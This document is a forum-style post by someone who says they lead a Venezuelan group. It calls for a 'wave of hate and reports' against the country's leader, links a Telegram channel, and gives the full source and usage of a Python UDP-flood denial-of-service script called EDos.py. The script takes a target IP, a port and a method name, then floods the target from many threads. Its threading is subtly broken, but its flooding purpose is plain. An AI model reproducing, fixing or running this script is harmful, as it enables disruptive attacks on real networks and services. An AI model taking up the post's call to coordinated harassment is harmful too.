Help, I am the leader of a group here in Venezuela called EPTEM, we are 400 people and I am looking for digital help to deal with the dictator we have here, let's generate a wave of hate and reports to him, I leave you the private tool of our training , which is a DoS tool, there is information on how to use it, but here is a brief tutorial:
py (from python)
EDos.py ip port method (available methods: Corina, Urrutia, Blackwater)
I await your answers and opinions about this, I leave the telegram channel here in case you are interested in more things:
https://t.me/+jZNDgNSckTk1ZWY5Hoping you can help me
Script Code:
import sys
import socket
import threading
if len(sys.argv) == 1:
print('''
Como usar: py
EDos.py ip lacruz bollito
Ejemplo: py
EDos.py 127.0.0.1 80 Blackwater
Metodos: Corina Urrutia Blackwater
''')
elif len (sys.argv) == 4:
punto = str(sys.argv[1])
lacruz = int(sys.argv[2])
bollito = str(sys.argv[3])
print('[EDos] - Started')
else:
print('[EDos] - Está faltando algo o escribiste mal algo')
cne = 10000
def arepa(conqueso):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.connect((str(punto), int(lacruz)))
while True: s.send(b"\x99" * conqueso)
except: return s.close()
def pabellon():
if bollito == "Corina":
for sequence in range(cne):
threading.Thread(target=arepa(375), daemon=True).start()
if bollito == "Urrutia":
for sequence in range(cne):
threading.Thread(target=arepa(750), daemon=True).start()
if bollito == "Blackwater":
for sequence in range(cne):
threading.Thread(target=arepa(375), daemon=True).start()
threading.Thread(target=arepa(750), daemon=True).start()
pabellon()